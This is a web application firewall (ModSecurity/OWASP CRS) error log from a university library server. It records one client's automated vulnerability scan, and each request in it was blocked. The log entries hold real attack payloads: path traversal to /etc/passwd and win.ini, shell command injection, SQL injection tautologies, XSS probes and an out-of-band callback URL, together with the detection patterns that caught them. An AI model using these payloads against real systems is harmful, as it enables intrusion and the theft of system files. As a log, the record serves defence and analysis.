[Tue Aug 29 11:42:33.389208 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAdeQ1wAAAAQ"]
[Tue Aug 29 11:42:34.442573 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAdSZMcAAAAX"]
[Tue Aug 29 11:42:40.415777 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:query: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/filter/jmol/js/jsmol/php/jsmol.php"] [unique_id "ZO13QMCo-f0AAAdxUR0AAAAC"]
[Tue Aug 29 11:42:40.433077 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZO13QMCo-f0AAAdXInMAAAAd"]
[Tue Aug 29 11:42:41.497774 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:c: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13QcCo-f0AAAdxUSEAAAAC"]
[Tue Aug 29 11:42:42.420337 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:tpl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:tpl: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/badging/badge_print_v0.php"] [unique_id "ZO13QsCo-f0AAAeYbxMAAAAB"]
[Tue Aug 29 11:42:43.429143 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:calculate_attribute_counts[0][query_type]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:calculate_attribute_counts[0][query_type]: calculate_attribute_counts[0][query_type]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13Q8Co-f0AAAdaZQoAAAAM"]
[Tue Aug 29 11:42:46.397366 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:path: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/scripts/logdownload.php"] [unique_id "ZO13RsCo-f0AAAdTBBYAAAAY"]
[Tue Aug 29 11:42:46.480902 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:fileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/servlets/FetchFile"] [unique_id "ZO13RsCo-f0AAAeYbx4AAAAB"]
[Tue Aug 29 11:42:47.377669 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13R8Co-f0AAAd232MAAAAI"]
[Tue Aug 29 11:42:47.415725 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13R8Co-f0AAAdb7mEAAAAb"]
[Tue Aug 29 11:42:48.386888 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26ggiei18yzcmocu.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAdftT0AAAAG"]
[Tue Aug 29 11:42:48.444505 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAARpg2cAAAAU"]
[Tue Aug 29 11:42:48.505120 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAdTBBwAAAAY"]
[Tue Aug 29 11:42:50.379486 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAd4ayoAAAAj"]
[Tue Aug 29 11:42:51.359722 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAeX1B4AAAAK"]
[Tue Aug 29 11:42:51.379605 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAdV7eIAAAAa"]
[Tue Aug 29 11:42:52.376366 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAQSW24AAAA0"]
[Tue Aug 29 11:42:53.356540 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAdxUS8AAAAC"]
[Tue Aug 29 11:42:53.389221 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAeoA-YAAAAT"]
[Tue Aug 29 11:42:54.421558 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAd-F0gAAAAt"]
[Tue Aug 29 11:42:54.438317 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdOeTYAAAAS"]
[Tue Aug 29 11:42:57.435626 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAc@caoAAAAL"]
[Tue Aug 29 11:42:59.693541 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAdftU8AAAAG"]
[Tue Aug 29 11:43:00.432256 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdUc4QAAAAZ"]
[Tue Aug 29 11:43:00.438766 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAcsLH4AAAAE"]
[Tue Aug 29 11:43:00.444504 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAeX1DIAAAAK"]
[Tue Aug 29 11:43:02.432237 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAd9UOcAAAAr"]
[Tue Aug 29 11:43:03.408009 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeX1DgAAAAK"]
[Tue Aug 29 11:43:04.419426 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAXNuY4AAAAg"]
[Tue Aug 29 11:43:04.458270 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAcsLIoAAAAE"]
[Tue Aug 29 11:43:06.397367 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeChaEAAAAw"]
[Tue Aug 29 11:43:08.003597 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAc921wAAAAD"]
[Tue Aug 29 11:43:08.041015 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdSZP4AAAAX"]
